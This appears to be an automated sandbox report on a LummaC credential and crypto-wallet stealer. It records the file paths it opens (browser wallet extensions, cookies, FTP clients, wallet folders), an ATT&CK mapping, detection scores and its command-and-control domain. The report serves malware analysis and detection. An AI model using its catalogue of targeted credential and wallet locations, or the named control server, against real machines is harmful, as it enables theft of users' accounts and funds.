Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1799079639.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2196, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2196, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	13 Virtualization/Sandbox Evasion	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	31 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	13 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	26%	ReversingLabs	Win32.Trojan.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://disobey-curly.sbs/apiI	0%	Avira URL Cloud	safe
https://disobey-curly.sbs:443/api	0%	Avira URL Cloud	safe
https://disobey-curly.sbs:443/apiO	0%	Avira URL Cloud	safe
https://disobey-curly.sbs/	0%	Avira URL Cloud	safe
https://disobey-curly.sbs/apiu	0%	Avira URL Cloud	safe
https://disobey-curly.sbs/u	0%	Avira URL Cloud	safe
https://disobey-curly.sbs/api.	0%	Avira URL Cloud	safe
https://disobey-curly.sbs/z	0%	Avira URL Cloud	safe
https://disobey-curly.sbs/api	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
disobey-curly.sbs	172.67.223.140	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://disobey-curly.sbs/api	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://disobey-curly.sbs:443/apiO	aspnet_regiis.exe, 00000002.00000003.1889111505.0000000002C71000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1888898483.0000000002C63000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1889212884.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2003619928.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	aspnet_regiis.exe, 00000002.00000003.1796754164.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://disobey-curly.sbs/apiI	aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1750336942.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749313377.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726686158.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005003000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1750336942.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749313377.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726686158.0000000004FB7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005003000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://disobey-curly.sbs/	aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1797517806.0000000004F6D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://disobey-curly.sbs/u	aspnet_regiis.exe, 00000002.00000003.1819973696.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1823663645.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://disobey-curly.sbs:443/api	aspnet_regiis.exe, 00000002.00000002.2003619928.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1820026079.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://disobey-curly.sbs/z	aspnet_regiis.exe, 00000002.00000003.1749787283.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	aspnet_regiis.exe, 00000002.00000003.1774551995.0000000004F6C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	aspnet_regiis.exe, 00000002.00000003.1726503626.0000000005005000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000002.00000003.1773071354.0000000004FAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://disobey-curly.sbs/api.	aspnet_regiis.exe, 00000002.00000002.2003656590.0000000002C92000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	aspnet_regiis.exe, 00000002.00000003.1726582628.0000000004F92000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://disobey-curly.sbs/apiu	aspnet_regiis.exe, 00000002.00000003.1836515078.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000002.00000003.1726031316.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725945858.0000000004FA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1725759416.0000000004FAB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	aspnet_regiis.exe, 00000002.00000003.1796754164.0000000004F6B000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.223.140	disobey-curly.sbs	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561487
Start date and time:	2024-11-23 14:58:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 9 Number of non-executed functions: 40
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.21
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target aspnet_regiis.exe, PID 2196 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
